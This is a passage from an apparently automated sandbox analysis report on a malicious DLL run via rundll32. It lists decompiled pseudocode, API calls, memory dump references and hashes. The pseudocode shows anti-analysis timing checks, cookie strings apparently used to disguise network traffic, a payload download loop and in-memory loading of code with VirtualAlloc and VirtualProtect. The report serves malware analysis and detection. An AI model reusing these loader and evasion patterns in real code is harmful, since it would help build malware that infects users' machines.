                                                  Control-flow Graph (rendered image not reproduced; legend: Executed / Not Executed). Basic blocks: 180001318-18000131c, 18000131e-180001323 (calls SleepEx, loops back to 180001329), 180001329-180001330, 180001332-180001334 (calls ExitProcess).
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessSleep
                                                  • String ID:
                                                  • API String ID: 911557368-0
                                                  • Opcode ID: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                                  • Instruction ID: 6bf3646277ed7659d23c391addaeef7dd43479a1e5d5f4f4aeea11294e6aed9e
                                                  • Opcode Fuzzy Hash: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                                  • Instruction Fuzzy Hash: C3D01231200248C7F2DBA721E8183EC3164A308382F90C129A106444E08F380B8C8304
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered image not reproduced; legend: Executed / Not Executed). Function spanning basic blocks 7fef74d36fa-7fef74d3a58; the graph shows calls to the internal routines 7fef74d7947, 7fef74da588 and 7fef74d8d0b, and a call to RtlAllocateHeap in block 7fef74d3828-7fef74d3843.
                                                  C-Code - Quality: 72%
                                                  			E000007FE7FEF74D36FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr* _a8, intOrPtr* _a16, signed int _a33, char _a36, char _a37, long long _a40, long long _a48, long long _a56, signed int _a64, long long _a72, long long _a80, long long _a88, long long _a96, void* _a136) {
                                                  				unsigned int _v48;
                                                  				intOrPtr _v64;
                                                  				intOrPtr* _v72;
                                                  				unsigned int _v80;
                                                  				char _v87;
                                                  				char _v88;
                                                  				long long _v104;
                                                  				signed long long _v112;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				intOrPtr _t65;
                                                  				signed int _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t76;
                                                  				signed int _t77;
                                                  				signed int _t78;
                                                  				void* _t82;
                                                  				signed int _t87;
                                                  				void* _t92;
                                                  				void* _t101;
                                                  				long long _t128;
                                                  				long long _t129;
                                                  				long long _t130;
                                                  				long long _t132;
                                                  				long long _t133;
                                                  				void* _t140;
                                                  				void* _t141;
                                                  				intOrPtr* _t154;
                                                  				long long _t155;
                                                  				void* _t156;
                                                  				void* _t157;
                                                  				void* _t158;
                                                  				void* _t159;
                                                  				void* _t160;
                                                  				void* _t161;
                                                  				void* _t162;
                                                  				void* _t163;
                                                  				void* _t164;
                                                  				void* _t165;
                                                  				void* _t166;
                                                  				void* _t167;
                                                  				void* _t168;
                                                  
                                                  				_t92 = __edx;
                                                  				_t128 = _a56 + 2;
                                                  				if (__esp == __esp) goto 0xf74d3721;
                                                  				_t64 = E000007FE7FEF74D7947(_t63, __ebx, _t82, __edx, __edi, __esi, _t128, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
                                                  				_a96 = _t128;
                                                  				goto 0xf74d3845;
                                                  				goto 0xf74d3708;
                                                  				_a56 = _t128;
                                                  				_t129 = _a40;
                                                  				if (_t64 == _t64) goto 0xf74d36ec;
                                                  				_t65 = E000007FE7FEF74D7947(_t64, __ebx, 0xd45a1e1f, _t92, __edi, __esi, _t129, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
                                                  				_a88 = _t129;
                                                  				if (_t92 == _t92) goto 0xf74d3717;
                                                  				 *((intOrPtr*)(_a136 + 8)) = _t65;
                                                  				if (__esi == __esi) goto 0xf74d375b;
                                                  				r8d = r8d + 2;
                                                  				if (0xd45a1e1f == 0xd45a1e1f) goto 0xf74d3767;
                                                  				if (0x67cc0818 == 0x67cc0818) goto 0xf74d372f;
                                                  				_t143 = _a56;
                                                  				E000007FE7FEF74D8D0B(_t65, 0x67cc0818, __esi, _t101, __esp, _t129, _a56,  &_a36, _t156, _t157, _t158, _t160, _t162, _t163, _t164, _t165, _t166, _t167);
                                                  				_a96();
                                                  				_t87 = _a33;
                                                  				E000007FE7FEF74D3D78(_t87, __esp, _t129, _t140, _t143,  &_a36, _t157, _t158, _t162, _t166, _t167);
                                                  				if (_t87 == _t87) goto 0xf74d37c0;
                                                  				_t70 = _t87;
                                                  				if (_t92 == _t92) goto 0xf74d379e;
                                                  				_t154 = _a136;
                                                  				if (__ebx == __ebx) goto 0xf74d3776;
                                                  				_t71 = _t70 << 4;
                                                  				_a64 = _t71;
                                                  				if (_t71 == _t71) goto 0xf74d3786;
                                                  				if ((_a64 | _t71) == (_a64 | _t71)) goto 0xf74d3793;
                                                  				_t155 =  *_t154;
                                                  				 *(_t155 +  *((intOrPtr*)(_t129 + 0x30))) = _t71;
                                                  				goto 0xf74d37d7;
                                                  				goto 0xf74d39c6;
                                                  				if (_a48 - _t129 >= 0) goto 0xf74d37d7;
                                                  				_t130 = _a48;
                                                  				goto 0xf74d37f2;
                                                  				goto 0xf74d395d;
                                                  				_a80 = _t130;
                                                  				E000007FE7FEF74DA588(1, _t140, _t155, _t156, _t162, _t163, _t164, _t166, _t168);
                                                  				if (__edi == __edi) goto 0xf74d381a;
                                                  				_t161 = _a56 + _t130;
                                                  				if (__ebx == __ebx) goto 0xf74d3828;
                                                  				if (__esp == __esp) goto 0xf74d380e;
                                                  				if (__esp == __esp) goto 0xf74d3834; // executed
                                                  				RtlAllocateHeap(??, ??, ??);
                                                  				if (__edi == __edi) goto 0xf74d3854;
                                                  				_t132 = _a136;
                                                  				_t76 =  *((intOrPtr*)(_t132 + 8));
                                                  				if (__ebx == __ebx) goto 0xf74d37ff;
                                                  				 *_a136 = _t132;
                                                  				_t133 = _a136;
                                                  				r8d = r8d + 0xf;
                                                  				if (0 == 0) goto 0xf74d386e;
                                                  				_t152 = _a136;
                                                  				_t77 = E000007FE7FEF74D8E8D(_t76, _t140, _t152, _t155, _t156, _t157, _t158, _t161, _t162, _t164, _t165, _t166, _t167, _t168);
                                                  				if (0 == 0) goto 0xf74d38b6;
                                                  				_a36 = _a36 + 0x24;
                                                  				_a37 = 5;
                                                  				goto 0xf74d3898;
                                                  				_a37 = _a37 + 0x73;
                                                  				r8d = 0;
                                                  				goto 0xf74d374d;
                                                  				_a56 = _t133;
                                                  				_a36 = 0xc;
                                                  				if (_t77 == _t77) goto 0xf74d388c;
                                                  				_t78 = _t77 / _t152;
                                                  				if (_t78 == _t78) goto 0xf74d3880;
                                                  				_a72 = _a40;
                                                  				goto 0xf74d391b;
                                                  				_t159 = _t159 - 0x78;
                                                  				goto 0xf74d3b2c;
                                                  				_v104 = _t155;
                                                  				_v112 = _t152;
                                                  				if (__esi == __esi) goto 0xf74d38d3;
                                                  				_t152 =  *_a8;
                                                  				E000007FE7FEF74D90C0( *((intOrPtr*)(_a40 + 8)), _a8, _t140,  *_a8, _t155, _t156, _t157, _t162, _t163, _t164, _t165, _t167, _t168);
                                                  				goto 0xf74d3b3f;
                                                  				goto 0xf74d38a8;
                                                  				if ( *_a8 == 0) goto 0xf74d3900;
                                                  				_t78 = 0;
                                                  				goto 0xf74d3900;
                                                  				_v80 = _v48;
                                                  				goto L8;
                                                  				_v87 = __al;
                                                  				goto 0xf74d3b1e;
                                                  				__rcx = _a16;
                                                  				__eax = E000007FE7FEF74D8E8D(__eax, __rbx, __rcx, __rdx, __rdi, __rsi, __rbp, __r8, __r9, __r11, __r12, __r13, __r14, __r15);
                                                  				if (__ah == __ah) goto 0xf74d399d;
                                                  				_v88 = __al;
                                                  				__rax = _v72;
                                                  				if (__dx == __dx) goto 0xf74d3990;
                                                  				r8d = r8d + 0xf;
                                                  				__edx = 0;
                                                  				if (__dl == __dl) goto 0xf74d3934;
                                                  				__rax = __rcx;
                                                  				__al =  *__rax;
                                                  				if (__bx == __bx) goto 0xf74d3945;
                                                  				__rcx = _a16;
                                                  				__r8 =  *__rcx;
                                                  				__eax = E000007FE7FEF74D3B56(__ecx, 0, __ebp, __rax, __rdx, __rsi, __rbp, __r8, __r11, __r13, __r14);
                                                  				goto 0xf74d3b0f;
                                                  				__rax = __rcx;
                                                  				__al =  *((intOrPtr*)(__rax + 1));
                                                  				if (__di == __di) goto 0xf74d3927;
                                                  				_v64 = _v64 + __rax;
                                                  				if (__ax == __ax) goto 0xf74d3985;
                                                  				__eax = E000007FE7FEF74DA588(__eax, __rbx, __rdx, __rdi, __r9, __r10, __r11, __r13, __r15);
                                                  				__rax =  *((intOrPtr*)(__rax + 0x60));
                                                  				goto 0xf74d3967;
                                                  				if (__eax != 0) goto 0xf74d39b9;
                                                  				if (_v80 - 2 < 0) goto 0xf74d39b9;
                                                  				goto E000007FE7FEF74D36FA;
                                                  				_v80 = _v80 >> 1;
                                                  				goto 0xf74d373d;
                                                  				__rsp = __rsp + 0x78;
                                                  				return __eax;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                                  • Instruction ID: 966cfb07d4891169f33f0eb5065ec30f3ff55f21518483f00f2b13c4e6352a57
                                                  • Opcode Fuzzy Hash: a0d91fdd5af79526e3923e3149c9a47a0b6a76bd8d68c7b7180e430b89e6b421
                                                  • Instruction Fuzzy Hash: AB313E66A2DA86C1EAF09E55E45437BE6D1E385B84F944039F5CE47BA4CA3CE8848700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                                  • Instruction ID: 91c5236132e037b4dad52b7741e0f6a58db73a54ac04ee9c9214898af67bde3f
                                                  • Opcode Fuzzy Hash: fbaeb0b3df8bc0706df18155176e3e92b35199adaf84ebd6d827a6017e15e73c
                                                  • Instruction Fuzzy Hash: 38D05E72A1024483E775D720A5063A93321A398359F80C205E64908954CF7DC25CC705
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E00000001180002AC0(intOrPtr __ebx, intOrPtr __edx, void* __eflags, signed int __rax, long long __rbx, signed int __rdx, long long __rsi) {
                                                  				signed int _t18;
                                                  				signed long long _t42;
                                                  				long long _t52;
                                                  				void* _t55;
                                                  				void* _t56;
                                                  
                                                  				 *((long long*)(_t55 + 8)) = __rbx;
                                                  				 *((long long*)(_t55 + 0x10)) = _t52;
                                                  				 *((long long*)(_t55 + 0x18)) = __rsi;
                                                  				_t56 = _t55 - 0x30;
                                                  				SwitchToThread();
                                                  				asm("rdtsc");
                                                  				_t42 = __rdx << 0x20;
                                                  				asm("cpuid");
                                                  				 *((intOrPtr*)(_t56 + 0x20)) = 1;
                                                  				 *((intOrPtr*)(_t56 + 0x24)) = __ebx;
                                                  				 *((intOrPtr*)(_t56 + 0x28)) = 0;
                                                  				 *((intOrPtr*)(_t56 + 0x2c)) = __edx;
                                                  				asm("rdtsc");
                                                  				_t43 = _t42 << 0x20;
                                                  				_t18 = SwitchToThread();
                                                  				asm("rdtsc");
                                                  				asm("rdtsc");
                                                  				if (__eflags != 0) goto 0x80002adb;
                                                  				return _t18 / (__rsi + ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020 | _t43 << 0x00000020 << 0x00000020) - ((__rax | _t42 | _t42 << 0x00000020) - (__rax | _t42) | _t43 << 0x00000020));
                                                  			}


                                                  APIs
                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002ADB
                                                  • SwitchToThread.KERNEL32(?,?,?,?,?,0000000180002D01,?,?,?,?,00000004,00000001800027CB), ref: 0000000180002B15
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                                  • Instruction ID: 31e80d72c3d44f8f19491c3afcfcc8ffca94b91b5460d3bc01de11eb56bf2daf
                                                  • Opcode Fuzzy Hash: daa6dbe73eacbe07049e851a88da4fb5940b4517f947b52f7d3a30b83cf7e21a
                                                  • Instruction Fuzzy Hash: 93019EB2B24A948BDF64CB26B600389B6A2E38C7C0F14C535EB9D43B18DA3CD5958B04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$AddressLibraryLoadProc
                                                  • String ID: %s%u$; _gat=$NTDLL.DLL$RtlGetVersion
                                                  • API String ID: 1873754389-181482773
                                                  • Opcode ID: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                                  • Instruction ID: b0e16dee8d78cd610c3fce9f61b73237315bc0fd6264dbce3c4a8d294556f37b
                                                  • Opcode Fuzzy Hash: 9bf10ddb181b82f56210e5c52edef951daa22d2c9024343e49e45360ad26c2da
                                                  • Instruction Fuzzy Hash: A1311872B00A4991EA62DB11F854BE97360FB9CBC5F848126EA0D67B65DF3CC61EC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrcat$FolderPath
                                                  • String ID: c:\ProgramData\
                                                  • API String ID: 2440492483-4167965204
                                                  • Opcode ID: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                                  • Instruction ID: 13a3a00d3bf98ac6014c4b177c238986472ee82a99ac8020d1391539c79a1c4f
                                                  • Opcode Fuzzy Hash: 05fb9603890ea37e221d746ad0541c6ddcf55fa1bfb4c4ac4fb54a3c77e688cc
                                                  • Instruction Fuzzy Hash: A8213472204B84C6EB52DF21E8043EAB765F758BC4F888021EE990BB69CF78C25DC714
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CreateDirectoryFolderPathlstrcpy
                                                  • String ID: c:\ProgramData\
                                                  • API String ID: 1583731639-4167965204
                                                  • Opcode ID: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                                  • Instruction ID: 6a04e3bab3544b7625e32e0bbe63c8079b4262e858a91f78b1d04aa0cec903dd
                                                  • Opcode Fuzzy Hash: 7e935584a37d3d6361fc61349a1cd69af6c5b8f1aabd1db1f1d05e25f9d24d15
                                                  • Instruction Fuzzy Hash: 4B211A72214A8A96EB51CF11E8447CE7364F788BC8F959022EA5E57668DF38C60ECB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                  			E000000011800027B4(void* __rax, void* __rbx, void* __rcx, void* _a8) {
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				void* __rdi;
                                                  				void* _t20;
                                                  				void* _t45;
                                                  
                                                  				E00000001180002C88(_t20, __rbx,  &_v24, __rcx, _t45, __rbx);
                                                  				r9d = _v24;
                                                  				wsprintfW(??, ??);
                                                  				r9d = _v20;
                                                  				wsprintfW(??, ??);
                                                  				r9d = _v12;
                                                  				wsprintfW(??, ??);
                                                  				r9d = _v16;
                                                  				wsprintfW(??, ??);
                                                  				return __rax;
                                                  			}


                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID: %s%u$; _ga=
                                                  • API String ID: 2111968516-3272795577
                                                  • Opcode ID: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                                  • Instruction ID: 8dfdff9f2ba73ed5fda4775318dfd5996efea46270aa07bd7b9716fa6782b752
                                                  • Opcode Fuzzy Hash: 39cfa979455bf35acecfaf6dc8e91e934a285b7c36309477a7fead913413f592
                                                  • Instruction Fuzzy Hash: 80119672704A4A92DA62CF14F5547E97320FB5C789F848226EA4D27A76DE3CC62EC740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 43%
                                                  			E00000001180001D80(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, intOrPtr* __r8, long long* __r9, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
                                                  				void* _v8;
                                                  				char _v136;
                                                  				void* __rdi;
                                                  				void* _t12;
                                                  				char* _t37;
                                                  				intOrPtr* _t51;
                                                  				void* _t66;
                                                  
                                                  				_t66 = __r11;
                                                  				_a8 = __rbx;
                                                  				_a16 = __rbp;
                                                  				_a24 = __rsi;
                                                  				_t51 = __r8;
                                                  				wsprintfW(??, ??);
                                                  				_t12 = E00000001180001B08( &_v136, __rdx, __r8, __r9);
                                                  				_t37 =  *_t51;
                                                  				if (_t12 == 0x194) goto 0x80001e2e;
                                                  				if (_t12 != 0xc8) goto 0x80001e01;
                                                  				if (_t37 == 0) goto 0x80001e1a;
                                                  				if ( *__r9 - 0x400 < 0) goto 0x80001e01;
                                                  				if ( *_t37 != 0x1f) goto 0x80001e01;
                                                  				if ( *((char*)(_t37 + 1)) != 0x8b) goto 0x80001e01;
                                                  				if (E00000001180001760(_t37, _t51, __r9, __r9, _t51, _t66, __r14) != 0) goto 0x80001e27;
                                                  				if (_t37 == 0) goto 0x80001e1a;
                                                  				GetProcessHeap();
                                                  				HeapFree(??, ??, ??);
                                                  				Sleep(??);
                                                  				goto 0x80001db5;
                                                  				goto 0x80001e49;
                                                  				if (_t37 == 0) goto 0x80001e47;
                                                  				GetProcessHeap();
                                                  				HeapFree(??, ??, ??);
                                                  				return 0;
                                                  			}


                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess$Sleepwsprintf
                                                  • String ID:
                                                  • API String ID: 2048420019-0
                                                  • Opcode ID: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                                  • Instruction ID: a2cd984f53a93593caa01796726c62d074961a460daaaee6897d674b1d8fdaee
                                                  • Opcode Fuzzy Hash: 5d16a19e01451f386ef0ae26424dbe1b79c541dbd7bb336a880d3781391ae622
                                                  • Instruction Fuzzy Hash: 06213872604BC8CAFBA2DB22E4043D97295AB5DBC2F48C131EF495B795DF38C6498341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 33%
                                                  			E00000001180001B5C(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
                                                  				void* _t13;
                                                  				void* _t29;
                                                  
                                                  				_a8 = __rbx;
                                                  				_a16 = __rsi;
                                                  				_t13 = __edx;
                                                  				GetProcessHeap();
                                                  				r8d = 0x2001;
                                                  				HeapAlloc(??, ??, ??);
                                                  				if (__rax == 0) goto 0x80001bc2;
                                                  				E000000011800014B4(__rax, __rax, __rax, L"Cookie: _s=", __rcx, _t29, __rcx);
                                                  				r9d = _t13;
                                                  				return wsprintfW(??, ??);
                                                  			}


                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreewsprintf
                                                  • String ID: %s%u$Cookie: _s=
                                                  • API String ID: 4121094037-887366058
                                                  • Opcode ID: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                                  • Instruction ID: 843dd351c34123922bb2a738a6afe93933f5c472e56c7fab694ad2d1448e7ea3
                                                  • Opcode Fuzzy Hash: 74adba2fbfe221d9218fc22692f7f932e8ec014434834bf0c5ddf0096d87e161
                                                  • Instruction Fuzzy Hash: 65F03772700B8981EA92CB0AF4443D93660F78CBC0F489124EE4E1B76ADE3CC64AC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 29%
                                                  			E00000001180002B5C(signed int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* _a8, long long _a16, long long _a24, long long _a32) {
                                                  				void* __rdi;
                                                  				signed int _t43;
                                                  				intOrPtr _t54;
                                                  				void* _t56;
                                                  				void* _t61;
                                                  				signed long long _t63;
                                                  				void* _t66;
                                                  				void* _t68;
                                                  				signed long long _t69;
                                                  				void* _t78;
                                                  				signed int _t80;
                                                  				intOrPtr* _t89;
                                                  
                                                  				_t68 = __rcx;
                                                  				_t63 = __rax;
                                                  				_a16 = __rbx;
                                                  				_a24 = __rbp;
                                                  				_a32 = __rsi;
                                                  				_t66 = __rcx;
                                                  				r8d = 0x3000;
                                                  				_t5 = _t68 + 4; // 0x4
                                                  				r9d = _t5;
                                                  				VirtualAlloc(??, ??, ??, ??);
                                                  				_t80 = __rax;
                                                  				if (__rax != 0) goto 0x80002baa;
                                                  				GetLastError();
                                                  				goto 0x80002c72;
                                                  				_t54 =  *((intOrPtr*)(__rcx + 0x1c));
                                                  				if (_t54 <= 0) goto 0x80002bf1;
                                                  				_t69 = __rax * 0x11;
                                                  				r8d =  *(_t69 + __rcx + 0x28);
                                                  				r10d =  *((intOrPtr*)(_t69 + __rcx + 0x20));
                                                  				_t89 = __r8 + __rcx;
                                                  				r9d =  *((intOrPtr*)(_t69 + __rcx + 0x2c));
                                                  				if (_t54 == 0) goto 0x80002bea;
                                                  				if (_t89 == 0) goto 0x80002bea;
                                                  				_t56 = __r9;
                                                  				if (_t56 == 0) goto 0x80002bea;
                                                  				 *((char*)(__r10 + __rax)) =  *_t89;
                                                  				if (_t56 != 0) goto 0x80002bd8;
                                                  				if (1 -  *((intOrPtr*)(__rcx + 0x1c)) < 0) goto 0x80002bb1;
                                                  				if (E00000001180001A3C(1 -  *((intOrPtr*)(__rcx + 0x1c)), __rax, __rcx, __rax, __rcx, __rax) != 0) goto 0x80002c07;
                                                  				goto 0x80002c72;
                                                  				if (E00000001180001E64(__rcx, __rax, __rcx, _t78, __rax, __rdx) != 0) goto 0x80002c28;
                                                  				GetLastError();
                                                  				goto 0x80002c72;
                                                  				if ( *((intOrPtr*)(_t66 + 0x1c)) <= 0) goto 0x80002c56;
                                                  				r8d =  *(_t63 * 0x11 + _t66 + 0x30) & 0x000000ff;
                                                  				VirtualProtect(??, ??, ??, ??);
                                                  				_t61 = 1 -  *((intOrPtr*)(_t66 + 0x1c));
                                                  				if (_t61 < 0) goto 0x80002c2d;
                                                  				if (_t61 == 0) goto 0x80002c72;
                                                  				 *((long long*)(_t63 + _t80))();
                                                  				_t43 = GetLastError();
                                                  				asm("bts eax, 0x1b");
                                                  				return _t43 & 0x00ffffff;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
